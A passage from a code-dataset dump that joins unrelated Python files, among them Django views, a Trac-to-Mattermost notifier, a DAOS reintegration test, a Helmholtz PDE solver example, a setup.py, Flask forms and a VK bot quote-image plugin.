except Exception:\n g_logger.exception(\"Failed to process token\")\n\n template = loader.get_template('token.html')\n current_site = get_current_site(request)\n context = {\n 'site_name': current_site.name,\n }\n return HttpResponse(template.render(context, request))\n\n\n@user_passes_test(lambda user: user.is_superuser)\ndef announcement(request):\n current_site = get_current_site(request)\n if request.method == 'POST':\n subject = \"\"\n body = \"\"\n try:\n subject = request.POST[\"subject\"]\n body = request.POST[\"message\"]\n test_flag = request.POST[\"test_email\"] == \"true\"\n except KeyError:\n test_flag = False\n\n if not len(body) or not len(subject):\n raise Http404(\"Subject or body missing\")\n\n if test_flag:\n user_list = [request.user]\n else:\n user_list = User.objects.all()\n\n sent_to = 0\n for user in user_list:\n message = loader.render_to_string('announcement_email.html', {\n 'user': user,\n 'body': body,\n 'site_name': current_site.name,\n 'site_domain': current_site.name,\n 'protocol': 'https' if request.is_secure() else 'http',\n })\n if user.profile.email_user(subject, message):\n sent_to += 1\n\n template = loader.get_template('announcement_sent.html')\n context = {\n 'site_name': current_site.name,\n 'user_list_len': sent_to,\n }\n\n return HttpResponse(template.render(context, request))\n\n template = loader.get_template('announcement.html')\n context = {\n 'site_name': current_site.name,\n }\n\n return HttpResponse(template.render(context, request))\n\n\n@permission_required('competition.change_match')\ndef print_tickets(request, comp_pk):\n current_site = get_current_site(request)\n\n comp = get_object_or_404(Competition, pk=comp_pk)\n\n tickets = comp.ticket_set.filter(used=False)\n\n if not tickets:\n raise Http404(\"Competition has no tickets\")\n\n template = loader.get_template('tickets.html')\n context = {\n 'site_name': current_site.name,\n 'comp': comp,\n 'tickets': tickets,\n }\n\n return HttpResponse(template.render(context, request))\n","sub_path":"member/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297944033","text":"# Copyright (c) 2015-2016 Truveris, Inc. 
All Rights Reserved.\n# See included LICENSE file.\n\nfrom trac.core import Component\nfrom trac.core import implements\nfrom trac.wiki.api import IWikiChangeListener\n\nfrom base import TracMattermostComponent\n\n\nclass WikiNotifications(Component, TracMattermostComponent):\n\n implements(IWikiChangeListener)\n\n def format_page(self, page, version=None):\n fmt = u\"[{name}]({link})\"\n if version:\n fmt = fmt + \" [v{version}]({difflink})\"\n\n return fmt.format(\n name=page.name,\n version=version,\n link=self.env.abs_href.wiki(page.name),\n difflink=self.env.abs_href.wiki(page.name, {\n \"action\": \"diff\",\n \"version\": version,\n }),\n )\n\n def wiki_page_added(self, page):\n fmt = u\"@{author} created {page}\"\n text = fmt.format(\n author=page.author,\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_changed(self, page, version, t, comment, author, ipnr):\n fmt = u\"@{author} edited {page}\"\n if comment:\n fmt = fmt + \": {comment}\"\n text = fmt.format(\n author=author,\n page=self.format_page(page, version),\n comment=comment,\n )\n self.send_notification(text)\n\n def wiki_page_deleted(self, page):\n fmt = u\"{page} was deleted\"\n text = fmt.format(\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_version_deleted(self, page):\n fmt = u\"a version of {page} was deleted\"\n text = fmt.format(\n page=self.format_page(page),\n )\n self.send_notification(text)\n\n def wiki_page_renamed(self, page, old_name):\n fmt = u\"{old_name} was renamed to {page}\"\n text = fmt.format(\n old_name=old_name,\n page=self.format_page(page),\n )\n self.send_notification(text)\n","sub_path":"trac_mattermost/wiki_notifications.py","file_name":"wiki_notifications.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150014016","text":"#!/usr/bin/python\n\"\"\"\n (C) Copyright 2020-2021 Intel Corporation.\n\n SPDX-License-Identifier: BSD-2-Clause-Patent\n\"\"\"\nimport random\nimport threading\nfrom osa_utils import OSAUtils\nfrom test_utils_pool import TestPool\nfrom write_host_file import write_host_file\nfrom apricot import skipForTicket\n\ntry:\n # python 3.x\n import queue as queue\nexcept ImportError:\n # python 2.7\n import Queue as queue\n\nclass OSAOfflineReintegration(OSAUtils):\n # pylint: disable=too-many-ancestors\n \"\"\"\n Test Class Description: This test runs\n daos_server offline reintegration test cases.\n\n :avocado: recursive\n \"\"\"\n def setUp(self):\n \"\"\"Set up for test case.\"\"\"\n super(OSAOfflineReintegration, self).setUp()\n self.dmg_command = self.get_dmg_command()\n self.ior_w_flags = self.params.get(\"write_flags\", '/run/ior/iorflags/*')\n self.ior_r_flags = self.params.get(\"read_flags\", '/run/ior/iorflags/*')\n self.ior_apis = self.params.get(\"ior_api\", '/run/ior/iorflags/*')\n self.ior_test_sequence = self.params.get(\n \"ior_test_sequence\", '/run/ior/iorflags/*')\n self.ior_dfs_oclass = self.params.get(\n \"obj_class\", '/run/ior/iorflags/*')\n # Recreate the client hostfile without slots defined\n self.hostfile_clients = write_host_file(\n self.hostlist_clients, self.workdir, None)\n self.out_queue = queue.Queue()\n\n def run_ior_thread(self, action, oclass, api, test):\n \"\"\"Start the IOR thread for either writing or\n reading data to/from a container.\n Args:\n action (str): Start the IOR thread with Read or\n Write\n oclass (str): IOR object class\n API (str): IOR API\n test (list): IOR 
test sequence\n flags (str): IOR flags\n \"\"\"\n if action == \"Write\":\n flags = self.ior_w_flags\n else:\n flags = self.ior_r_flags\n\n # Add a thread for these IOR arguments\n process = threading.Thread(target=self.ior_thread,\n kwargs={\"pool\": self.pool,\n \"oclass\": oclass,\n \"api\": api,\n \"test\": test,\n \"flags\": flags,\n \"results\":\n self.out_queue})\n # Launch the IOR thread\n process.start()\n # Wait for the thread to finish\n process.join()\n\n\n def run_offline_reintegration_test(self, num_pool, data=False,\n server_boot=False):\n \"\"\"Run the offline reintegration without data.\n Args:\n num_pool (int) : total pools to create for testing purposes.\n data (bool) : whether pool has no data or to create\n some data in pool. Defaults to False.\n server_boot (bool) : Perform system stop/start on a rank.\n Defults to False.\n \"\"\"\n # Create a pool\n pool = {}\n pool_uuid = []\n exclude_servers = (len(self.hostlist_servers) * 2) - 1\n\n # Exclude rank : two ranks other than rank 0.\n rank = random.randint(1, exclude_servers)\n\n for val in range(0, num_pool):\n pool[val] = TestPool(self.context,\n dmg_command=self.get_dmg_command())\n pool[val].get_params(self)\n # Split total SCM and NVME size for creating multiple pools.\n pool[val].scm_size.value = int(pool[val].scm_size.value /\n num_pool)\n pool[val].nvme_size.value = int(pool[val].nvme_size.value /\n num_pool)\n pool[val].create()\n pool_uuid.append(pool[val].uuid)\n self.pool = pool[val]\n if data:\n self.run_ior_thread(\"Write\", self.ior_dfs_oclass[0],\n self.ior_apis[0], self.ior_test_sequence[0])\n\n # Exclude and reintegrate the pool_uuid, rank and targets\n for val in range(0, num_pool):\n self.pool = pool[val]\n self.pool.display_pool_daos_space(\"Pool space: Beginning\")\n pver_begin = self.get_pool_version()\n self.log.info(\"Pool Version at the beginning %s\", pver_begin)\n if server_boot is False:\n output = self.dmg_command.pool_exclude(self.pool.uuid,\n rank)\n else:\n output = self.dmg_command.system_stop(ranks=rank)\n self.pool.wait_for_rebuild(True)\n self.log.info(output)\n output = self.dmg_command.system_start(ranks=rank)\n\n self.log.info(output)\n self.is_rebuild_done(3)\n self.assert_on_rebuild_failure()\n\n pver_exclude = self.get_pool_version()\n self.log.info(\"Pool Version after exclude %s\", pver_exclude)\n # Check pool version incremented after pool exclude\n # pver_exclude should be greater than\n # pver_begin + 8 targets.\n self.assertTrue(pver_exclude > (pver_begin + 8),\n \"Pool Version Error: After exclude\")\n output = self.dmg_command.pool_reintegrate(self.pool.uuid,\n rank)\n self.log.info(output)\n self.is_rebuild_done(3)\n self.assert_on_rebuild_failure()\n\n pver_reint = self.get_pool_version()\n self.log.info(\"Pool Version after reintegrate %d\", pver_reint)\n # Check pool version incremented after pool reintegrate\n self.assertTrue(pver_reint > (pver_exclude + 1),\n \"Pool Version Error: After reintegrate\")\n\n for val in range(0, num_pool):\n display_string = \"Pool{} space at the End\".format(val)\n self.pool = pool[val]\n self.pool.display_pool_daos_space(display_string)\n\n if data:\n self.run_ior_thread(\"Read\", self.ior_dfs_oclass[0],\n self.ior_apis[0], self.ior_test_sequence[0])\n\n def test_osa_offline_reintegration(self):\n \"\"\"Test ID: DAOS-4749\n Test Description: Validate Offline Reintegration\n\n :avocado: tags=all,daily_regression,hw,medium,ib2\n :avocado: tags=osa,offline_reintegration\n \"\"\"\n # Perform reintegration testing with a pool\n 
self.run_offline_reintegration_test(1, True)\n\n @skipForTicket(\"DAOS-6766, DAOS-6783\")\n def test_osa_offline_reintegration_server_stop(self):\n \"\"\"Test ID: DAOS-6748.\n Test Description: Validate Offline Reintegration with server stop\n :avocado: tags=all,pr,daily_regression,hw,medium,ib2,osa\n :avocado: tags=offline_reintegration_srv_stop\n \"\"\"\n self.run_offline_reintegration_test(1, data=True, server_boot=True)\n","sub_path":"src/tests/ftest/osa/osa_offline_reintegration.py","file_name":"osa_offline_reintegration.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"489895967","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pybie2d\nfrom ipde.embedded_boundary import EmbeddedBoundary\nfrom ipde.ebdy_collection import EmbeddedBoundaryCollection\nfrom ipde.heavisides import SlepianMollifier\nfrom ipde.derivatives import fd_x_4, fd_y_4, fourier\nfrom ipde.solvers.multi_boundary.modified_helmholtz import ModifiedHelmholtzSolver\nfrom qfs.two_d_qfs import QFS_Evaluator\nfrom personal_utilities.arc_length_reparametrization import arc_length_parameterize\nstar = pybie2d.misc.curve_descriptions.star\nsquish = pybie2d.misc.curve_descriptions.squished_circle\nGSB = pybie2d.boundaries.global_smooth_boundary.global_smooth_boundary.Global_Smooth_Boundary\nGrid = pybie2d.grid.Grid\nMH_Layer_Form = pybie2d.kernels.high_level.modified_helmholtz.Modified_Helmholtz_Layer_Form\nMH_Layer_Apply = pybie2d.kernels.high_level.modified_helmholtz.Modified_Helmholtz_Layer_Apply\n\nimport time\n\nnb = 800\nhelmholtz_k = 5.0\nM = 20\npad_zone = 0\nverbose = True\nplot = True\nreparametrize = True\nslepian_r = 1.5*M\nsolver_type = 'fourth' # fourth or spectral\n\n# get heaviside function\nMOL = SlepianMollifier(slepian_r)\n# construct boundary\nbdy1 = GSB(c=star(4*nb, a=0.05, r=3, f=7))\nbdy2 = GSB(c=squish(nb, x=-1.2, y=-0.7, b=0.05, rot=-np.pi/4))\nbdy3 = GSB(c=star(nb, x=1, y=0.5, a=0.2, f=3))\nif reparametrize:\n\tbdy1 = GSB(*arc_length_parameterize(bdy1.x, bdy1.y))\n\tbdy2 = GSB(*arc_length_parameterize(bdy2.x, bdy2.y))\n\tbdy3 = GSB(*arc_length_parameterize(bdy3.x, bdy3.y))\nbh1 = bdy1.dt*bdy1.speed.min()\nbh2 = bdy2.dt*bdy2.speed.min()\nbh3 = bdy3.dt*bdy3.speed.min()\nbh = min(bh1, bh2, bh3)\nif plot:\n\tfig, ax = plt.subplots()\n\tax.scatter(bdy1.x, bdy1.y, color='black')\n\tax.scatter(bdy2.x, bdy2.y, color='blue')\n\tax.scatter(bdy3.x, bdy3.y, color='red')\n# get number of gridpoints to roughly match boundary spacing\nng = 2*int(0.5*7//bh)\n# construct a grid\ngrid = Grid([-3.5, 3.5], ng, [-3.5, 3.5], ng, x_endpoints=[True, False], y_endpoints=[True, False])\n# construct embedded boundary\nbdys = [bdy1, bdy2, bdy3]\nkwa = {'pad_zone':pad_zone, 'heaviside':MOL.step, 'interpolation_scheme':'polyi'}\nebdys = [EmbeddedBoundary(bdy, bdy is bdy1, M, bh, **kwa) for bdy in bdys]\nebdyc = EmbeddedBoundaryCollection(ebdys)\n# register the grid\nprint('\\nRegistering the grid')\nebdyc.register_grid(grid, verbose=verbose)\n\n# timing for grid registration!\nfor i in range(3):\n\tst = time.time()\n\tebdys[i].register_grid(grid)\n\tprint((time.time()-st)*1000)\n\n# make some plots\nif plot:\n\tfig, ax = plt.subplots()\n\tcolors = ['black', 'blue', 'red', 'purple', 'purple']\n\tfor ebdy in ebdys:\n\t\tq = ebdy.bdy_qfs\n\t\tq1 = q.interior_source_bdy if ebdy.interior else q.exterior_source_bdy\n\t\tq = ebdy.interface_qfs\n\t\tq2 = q.interior_source_bdy\n\t\tq3 = 
q.exterior_source_bdy\n\t\tbbs = [ebdy.bdy, ebdy.interface, q1, q2, q3]\n\t\tfor bi, bb in enumerate(bbs):\n\t\t\tax.plot(bb.x, bb.y, color=colors[bi])\n\n################################################################################\n# Get solution, forces, BCs\n\nk = 20*np.pi/7\n\nsolution_func = lambda x, y: np.exp(np.sin(k*x))*np.sin(k*y)\nforce_func = lambda x, y: helmholtz_k**2*solution_func(x, y) - k**2*np.exp(np.sin(k*x))*np.sin(k*y)*(np.cos(k*x)**2-np.sin(k*x)-1.0)\nf = force_func(grid.xg, grid.yg)\nfrs = [force_func(ebdy.radial_x, ebdy.radial_y) for ebdy in ebdys]\nua = solution_func(grid.xg, grid.yg)\nuars = [solution_func(ebdy.radial_x, ebdy.radial_y) for ebdy in ebdys]\nbcs2v = solution_func(ebdyc.all_bvx, ebdyc.all_bvy)\nbcs2l = ebdyc.v2l(bcs2v)\n\n################################################################################\n# Setup Poisson Solver\n\nsolver = ModifiedHelmholtzSolver(ebdyc, solver_type=solver_type, k=helmholtz_k)\nue, uers = solver(f, frs, tol=1e-12, verbose=verbose)\n\nif plot:\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, ue)\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\n# this isn't correct yet because we haven't applied boundary conditions\ndef two_d_split(MAT, hsplit, vsplit):\n\tvsplits = np.vsplit(MAT, vsplit)\n\treturn [np.hsplit(vsplit, hsplit) for vsplit in vsplits]\n\nNs = [ebdy.bdy.N for ebdy in ebdyc.ebdys]\nCNs = np.cumsum(Ns)\nCN = CNs[:-1]\ntotal_N = CNs[-1]\nMAT = np.zeros([total_N, total_N], dtype=float)\nMATS = two_d_split(MAT,CN,CN)\n\nd_only = lambda src, trg: MH_Layer_Form(src, trg, ifdipole=True, k=helmholtz_k)\nc_only = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, k=helmholtz_k)\nc_and_d = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, ifdipole=True, k=helmholtz_k)\nd_singular = lambda src: src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k)\nc_singular = lambda src: src.Modified_Helmholtz_SLP_Self_Form(k=helmholtz_k)\ncd_singular = lambda src: c_singular(src) + d_singular(src)\nhalf_eye = lambda src: np.eye(src.N)*0.5\n\nMATS[0][0][:] = d_singular(bdy1) - half_eye(bdy1)\nMATS[0][1][:] = c_and_d(bdy2, bdy1)\nMATS[0][2][:] = c_and_d(bdy3, bdy1)\n\nMATS[1][0][:] = d_only(bdy1, bdy2)\nMATS[1][1][:] = cd_singular(bdy2) + half_eye(bdy2)\nMATS[1][2][:] = c_and_d(bdy3, bdy2)\n\nMATS[2][0][:] = d_only(bdy1, bdy3)\nMATS[2][1][:] = c_and_d(bdy2, bdy3)\nMATS[2][2][:] = cd_singular(bdy3) + half_eye(bdy3)\n\n# get the inhomogeneous solution on the boundary\nbvs = solver.get_boundary_values(uers)\n\n# solve for density\ntau = np.linalg.solve(MAT, bcs2v - bvs)\n\n# separate this into pieces\ntaul = ebdyc.v2l(tau)\n\n# get effective sources\nqfs_list = []\nNaive_SLP = lambda src, trg: MH_Layer_Form(src, trg, ifcharge=True, k=helmholtz_k)\nfor ebdy in ebdys:\n\tif ebdy.interior:\n\t\tdef Kernel_Function(src, trg):\n\t\t\treturn src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k) - 0.5*np.eye(src.N)\n\telse:\n\t\tdef Kernel_Function(src, trg):\n\t\t\treturn src.Modified_Helmholtz_DLP_Self_Form(k=helmholtz_k) + src.Modified_Helmholtz_SLP_Self_Form(k=helmholtz_k) + 0.5*np.eye(src.N)\n\tqfs = QFS_Evaluator(ebdy.bdy_qfs, ebdy.interior, [Kernel_Function,], Naive_SLP, on_surface=True, form_b2c=False)\n\tqfs_list.append(qfs)\n\n# compute sigmas\nsigmal = [qfs([tau]) for qfs, tau in 
zip(qfs_list, taul)]\nsigmav = np.concatenate(sigmal)\n\n# evaluate this onto all gridpoints and radial points\nout = MH_Layer_Apply(ebdyc.bdy_inward_sources, ebdyc.grid_and_radial_pts, charge=sigmav, k=helmholtz_k)\ngslp, rslpl = ebdyc.divide_grid_and_radial(out)\n\nue[ebdyc.phys] += gslp\nfor uer, rslp in zip(uers, rslpl):\n\tuer += rslp\n\nif plot:\n\tmue = np.ma.array(ue, mask=ebdyc.ext)\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, mue)\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\n# compute the error\nrerrs = [np.abs(uer - uar).max() for uer, uar in zip(uers, uars)]\ngerr = np.abs(ue - ua)\ngerrp = gerr[ebdyc.phys]\nmgerr = np.ma.array(gerr, mask=ebdyc.ext)\n\nif plot:\n\tfig, ax = plt.subplots()\n\tclf = ax.pcolormesh(grid.xg, grid.yg, mgerr + 1e-15, norm=mpl.colors.LogNorm())\n\tfor ebdy in ebdys:\n\t\tax.plot(ebdy.bdy.x, ebdy.bdy.y, color='black', linewidth=3)\n\t\tax.plot(ebdy.interface.x, ebdy.interface.y, color='white', linewidth=1, alpha=0.1)\n\tplt.colorbar(clf)\n\tax.set(xticks=[], xticklabels=[])\n\tax.set(yticks=[], yticklabels=[])\n\nprint('Error in grid: {:0.2e}'.format(gerrp.max()))\nfor ri, rerr in enumerate(rerrs):\n\tprint('Error in annulus', ri+1, 'is: {:0.2e}'.format(rerr))\n","sub_path":"examples/multi_modified_helmholtz.py","file_name":"multi_modified_helmholtz.py","file_ext":"py","file_size_in_byte":7584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492999059","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\nimport edx_rest_framework_extensions\n\n\ndef is_requirement(line):\n \"\"\"\n Return True if the requirement line is a package requirement;\n that is, it is not blank, a comment, or editable.\n \"\"\"\n # Remove whitespace at the start/end of the line\n line = line.strip()\n\n # Skip blank lines, comments, and editable installs\n return not (\n line == '' or\n line.startswith('-r') or\n line.startswith('#') or\n line.startswith('-e') or\n line.startswith('git+') or\n line.startswith('-c')\n )\n\n\ndef load_requirements(*requirements_paths):\n \"\"\"\n Load all requirements from the specified requirements files.\n Returns a list of requirement strings.\n \"\"\"\n requirements = set()\n for path in requirements_paths:\n requirements.update(\n line.strip() for line in open(path).readlines()\n if is_requirement(line)\n )\n return list(requirements)\n\n\nsetup(\n name='edx-drf-extensions',\n version=edx_rest_framework_extensions.__version__,\n description='edX extensions of Django REST Framework',\n author='edX',\n author_email='oscm@edx.org',\n url='https://github.com/edx/edx-drf-extensions',\n license='Apache 2.0',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Framework :: Django',\n 'Framework :: Django :: 2.2',\n 'Framework :: Django :: 3.0',\n 'Framework :: Django :: 3.1',\n 'Framework :: Django :: 3.2',\n ],\n packages=find_packages(exclude=[\"tests\"]),\n install_requires=load_requirements('requirements/base.in'),\n 
tests_require=load_requirements('requirements/test.in'),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355987680","text":"# This file is part of the GBI project.\n# Copyright (C) 2013 Omniscale GmbH & Co. KG \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom flask import request\nfrom flask.ext.wtf import SelectField, HiddenField, TextField, validators\nfrom flask.ext.babel import lazy_gettext as _l\nfrom .base import Form\n\n\nclass WFSEditForm(Form):\n def is_submitted(self):\n return (\n request\n and request.method in (\"PUT\", \"POST\")\n and request.form.get(\"edit_form\")\n )\n\n layer = SelectField(_l(\"wfs_layer\"))\n external_editor = HiddenField()\n edit_form = HiddenField()\n\n\nclass WFSAddLayerForm(Form):\n def is_submitted(self):\n return (\n request\n and request.method in (\"PUT\", \"POST\")\n and request.form.get(\"add_form\")\n )\n\n new_layer = TextField(_l(\"wfs_new_layer_name\"), validators=[validators.Required()])\n add_form = HiddenField()\n","sub_path":"gr/gbi-server/app/gbi_server/forms/wfs.py","file_name":"wfs.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"247114158","text":"import sys\n\ndry_run = True\nif dry_run:\n file = open('res/max_mex.txt')\n sys.stdin = file\n\nglobal var\nfor t in range(int(input())):\n n, m = map(int, input().split())\n arr = [int(i) for i in input().split()]\n smaller_set = set()\n smaller_unique_sum = 0\n ms_count = 0\n for e in arr:\n if e == m:\n ms_count += 1\n continue\n if e < m:\n if e not in smaller_set:\n smaller_set.add(e)\n smaller_unique_sum += e\n if smaller_unique_sum == ((m - 1) * m) / 2:\n print(n - ms_count)\n else:\n print(-1)\n pass\n","sub_path":"codechef/cook_off/june/max_mex.py","file_name":"max_mex.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"615166673","text":"from handler.base_plugin_command import CommandPlugin\nfrom vk.helpers import upload_photo\nfrom utils import traverse\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nimport aiohttp\nimport datetime, io\n\n\nclass QuotePlugin(CommandPlugin):\n __slots__ = (\"q\", \"qf\", \"f\", \"fs\")\n\n def __init__(self, *commands, prefixes=None, strict=False):\n \"\"\"Answers with image containing stylish quote.\"\"\"\n\n super().__init__(*commands, prefixes=prefixes, strict=strict)\n\n self.q = Image.open(self.get_path(\"q.png\")).resize((40, 40), Image.LANCZOS)\n self.qf = self.q.copy().transpose(Image.FLIP_LEFT_RIGHT).transpose(Image.FLIP_TOP_BOTTOM)\n\n self.f = ImageFont.truetype(self.get_path(\"font.ttf\"), 20)\n self.fs = ImageFont.truetype(self.get_path(\"font.ttf\"), 14)\n\n example = self.command_example()\n self.description = [f\"Генератор цитат\",\n f\"{example} 
[титул] - перешлите сообщение и укажите титул (по желанию) и \"\n \"получите цитату!\"]\n\n async def process_message(self, msg):\n command, otext = self.parse_message(msg)\n\n i, url, name, last_name = None, None, None, None\n\n for m in traverse(await msg.get_full_forwarded()):\n if m.full_text:\n if i == m.true_user_id:\n text += \"\\n\" + m.full_text\n continue\n elif i is not None:\n break\n\n i = m.true_user_id\n\n u = await self.api.users.get(user_ids=i, fields=\"photo_max\")\n if not u: continue\n u = u[0]\n\n url = u[\"photo_max\"]\n name = u[\"first_name\"]\n last_name = u[\"last_name\"]\n\n text = m.full_text\n else:\n if i is None:\n return await msg.answer(\"Нечего цитировать!\")\n\n async with aiohttp.ClientSession() as sess:\n async with sess.get(url) as response:\n img = Image.open(io.BytesIO(await response.read()))\n img = img.resize((200, 200))\n\n rsize = (700, 400)\n res = Image.new(\"RGBA\", rsize, color=(0, 0, 0))\n res.paste(img, (25, 100))\n\n tex = Image.new(\"RGBA\", rsize, color=(0, 0, 0))\n\n draw = ImageDraw.Draw(tex)\n\n sidth = draw.textsize(\" \", font=self.f)[0]\n seight = int(draw.textsize(\"I\", font=self.f)[1] * 1.05)\n\n text = text.splitlines()\n\n midth = 0\n width = 0\n height = 0\n for line in text:\n for word in line.split(\" \"):\n size = draw.textsize(word, font=self.f)\n\n if width + size[0] >= rsize[0] - 340:\n height += seight\n width = 0\n\n draw.text((width, height), word, font=self.f)\n width += sidth + size[0]\n\n if width > midth:\n midth = width\n\n height += seight\n width = 0\n\n y = rsize[1] // 2 - height // 2\n x = 300 + (rsize[0] - 370 - midth) // 2\n res.alpha_composite(tex, (x, y))\n\n if height < 210:\n height = 210\n y = rsize[1] // 2 - height // 2\n\n res.alpha_composite(self.q, (250, y + 10))\n res.alpha_composite(self.qf, (rsize[0] - 75, y + int(height - seight * 2 + 10)))\n\n draw = ImageDraw.Draw(res)\n draw.multiline_text((25, 310), f\"© {name} {last_name}{' - ' + otext if otext else ''}\\n\"\n f\"@ {datetime.date.today()}\", font=self.fs)\n\n f = io.BytesIO()\n res.save(f, format='png')\n f.seek(0)\n attachment = await upload_photo(self.api, f, msg.user_id)\n f.close()\n\n return await msg.answer('', attachment=str(attachment))\n","sub_path":"plugins/content/quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521957984","text":"import json\nimport itertools\n\nTHRESHOLD = 240.9\n\n\ndef get_all_labels(num_questions):\n \"\"\"\n :param num_questions: (int) the number of questions\n :return: [str], a lists list to the low and high question\n columns name prefixes in order\n \"\"\"\n high_question_labels = ['high_q{}'.format(num) for\n num in range(num_questions // 2)]\n low_question_labels = ['low_q{}'.format(num) for\n num in range(num_questions // 2)]\n return low_question_labels + high_question_labels\n\n\ndef get_judgment_labels(num_judgments):\n \"\"\"\n :param num_judgments: (int) the number of num_judgments\n :return: [str], a list of all the judgment suffixes in columns names\n \"\"\"\n return ['j{}'.format(num) for num in range(num_judgments)]\n\n\ndef get_col_labels(num_questions, num_judgments):\n \"\"\"\n :param num_questions: (int) the number of questions\n :param num_judgments: (int) the number of responses\n :return: (gen) a generator yielding strings for column names\n \"\"\"\n yield 'consent'\n for q_num in range(num_questions // 2):\n yield from 
['low_q{}_score'.format(q_num),\n 'low_q{}_index'.format(q_num),\n 'low_q{}_choice'.format(q_num)]\n for j_num in range(num_judgments):\n yield 'low_q{}_j{}'.format(q_num, j_num)\n for q_num in range(num_questions // 2):\n yield from ['high_q{}_score'.format(q_num),\n 'high_q{}_index'.format(q_num),\n 'high_q{}_choice'.format(q_num)]\n for j_num in range(num_judgments):\n yield 'high_q{}_j{}'.format(q_num, j_num)\n\n\ndef fill_experiment_three_data(data, master_responses):\n \"\"\"\n :param data: (dict) a structured dictionary with lists as values which will\n be updated\n :param master_responses: [dict] list of responses to the survey\n :return: (None) the dictionary data is mutated\n \"\"\"\n for person in master_responses:\n # Grab person and first response\n responses = person['data']\n first_response = responses[0]\n\n # Gather experimental set-up information\n judgment_indices = first_response['judgmentIndicies']\n question_indices = first_response['questionIndicies']\n question_scores = first_response['questionScores']\n question_labels = _get_question_labels(question_scores)\n\n # Update score and index information\n for label, score, index in zip(question_labels, question_scores,\n question_indices):\n data['{}_score'.format(label)].append(score)\n data['{}_index'.format(label)].append(index)\n\n # Update consent information\n consent_answer = json.loads(first_response['responses'])\n consent_value = 1 if consent_answer['Q0'].startswith(\n 'I consent') else 0\n data['consent'].append(consent_value)\n\n # Update judgment responses\n headers = ('{}_j{}'.format(q_label, j_label) for q_label, j_label in\n itertools.product(question_labels, judgment_indices))\n for likert_index in range(2, 12):\n likert_data = responses[likert_index]\n likert_responses = json.loads(likert_data['responses'])\n for sorted_label in sorted(likert_responses):\n data[next(headers)].append(int(likert_responses[sorted_label]))\n\n # Update choices\n choice_data = responses[13]\n choice_responses = json.loads(choice_data['responses'])\n for q_label, key in zip(question_labels, sorted(choice_responses)):\n choice_option = choice_responses[key]\n choice_value = 1 if choice_option == 'Reveal Answer' else 0\n data['{}_choice'.format(q_label)].append(choice_value)\n\n\ndef _get_question_labels(question_scores):\n \"\"\"\n :param question_scores: [int] the ordered list of scores corresponding to\n the up-votes of questions\n :return: [str] the labels of each of the questions for the DataFrame in\n order\n \"\"\"\n num_questions = len(question_scores)\n low_nums = iter(range(num_questions // 2))\n high_nums = iter(range(num_questions // 2))\n question_labels = []\n for score in question_scores:\n if score < THRESHOLD:\n question_labels.append('low_q{}'.format(next(low_nums)))\n else:\n question_labels.append('high_q{}'.format(next(high_nums)))\n return question_labels\n","sub_path":"analysis/05-cogsci-paper/utilities/processing_two.py","file_name":"processing_two.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549539787","text":"#\n# Collective Knowledge (os)\n#\n# See CK LICENSE.txt for licensing details\n# See CK COPYRIGHT.txt for copyright details\n#\n# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net\n#\n\ncfg={} # Will be updated by CK (meta description of this module)\nwork={} # Will be updated by CK (temporal data)\nck=None # Will be updated by CK (initialized CK kernel) \n\n# Local 
